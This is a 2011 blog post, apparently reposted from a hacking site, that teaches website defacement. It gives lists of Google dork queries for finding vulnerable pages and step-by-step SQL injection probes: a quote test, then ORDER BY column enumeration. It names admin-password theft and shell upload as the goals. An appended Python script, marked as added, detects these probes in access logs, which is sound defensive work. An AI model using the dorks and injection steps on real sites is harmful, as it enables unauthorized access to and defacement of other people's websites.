Tuesday, March 1, 2011

Deface Websites using SQL and PHP scripting

SOURCE and more info at: www.hackingexpert.com


WHAT IS DEFACEMENT?
Defacing a website simply means replacing the site's index.html file with our own file. Every user who opens the site will then see our page (i.e. the one we uploaded).
For defacing a website, the three things you need most are:
1. SQL Injection (for analyzing website loops)
2. Admin Password
3. Shell Script (for getting Admin Controls)

1. Finding the Target and the Admin Password
First of all, we must find our target website. I have collected a lot of dorks, i.e. the vulnerability points of websites. Some Google searches can be awesomely utilized to find vulnerable websites.
Below are some example queries.

Examples: open Google and copy and paste these queries:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

Here are some more queries (use them without quotation marks):
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID"

Now the admin password hacking procedure:
1). Check for vulnerability
Let's say that we have a site like this:

http://www.site.com/news.php?id=5

Now, to test whether it is vulnerable, we add a ' (quote) to the end of the URL, which gives

http://www.site.com/news.php?id=5'

If we get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..." or something similar, that means the site is vulnerable to SQL injection.

2). Find the number of columns
To find the number of columns we use the ORDER BY statement (it tells the database how to order the result). So how do we use it?
We just keep incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like this: Unknown column '4' in 'order clause', or something like that)

That means it has 3 columns, because we got an error on 4.
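
Seen from the server side, the two probes above (a quote appended to a numeric parameter, then ORDER BY with an increasing number) leave a recognizable trace in the access log. The following is an added example, not part of the original post, that flags both patterns in constructed log lines; the log layout, the `scan` function and the `MIN_STEPS` threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Mar/2011:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Mar/2011:10:00:05 +0000] "GET /news.php?id=5%27 HTTP/1.1" 500 310
203.0.113.7 - - [01/Mar/2011:10:00:09 +0000] "GET /news.php?id=5%20order%20by%201/* HTTP/1.1" 200 5120
203.0.113.7 - - [01/Mar/2011:10:00:12 +0000] "GET /news.php?id=5%20order%20by%202/* HTTP/1.1" 200 5120
203.0.113.7 - - [01/Mar/2011:10:00:15 +0000] "GET /news.php?id=5%20order%20by%203/* HTTP/1.1" 200 5120
203.0.113.7 - - [01/Mar/2011:10:00:18 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 500 310
198.51.100.4 - - [01/Mar/2011:10:01:00 +0000] "GET /news.php?id=12 HTTP/1.1" 200 4800
198.51.100.4 - - [01/Mar/2011:10:01:30 +0000] "GET /search.php?q=o%27brien HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A numeric value followed by a quote; free text such as o'brien does not match.
QUOTE_PROBE = re.compile(r"^\d+\s*['\"]")
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)
MIN_STEPS = 3  # assumed threshold: distinct ORDER BY ordinals that count as enumeration


def scan(log_text):
    """Return findings for quote probes and ORDER BY column enumeration."""
    findings = []
    ordinals = defaultdict(set)  # (client, path, param) -> ordinals seen
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        for name, value in parse_qsl(url.query):  # percent-decodes the value
            key = (client, url.path, name)
            if QUOTE_PROBE.search(value):
                findings.append(("quote_probe", *key, status))
            hit = ORDER_BY.search(value)
            if hit:
                ordinals[key].add(int(hit.group(1)))
    for key, seen in ordinals.items():
        if len(seen) >= MIN_STEPS:
            findings.append(("order_by_enumeration", *key, max(seen)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 500 status on the quote probe, as in the sample, also shows that database errors are reaching the client, which is worth fixing separately from the injection itself.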
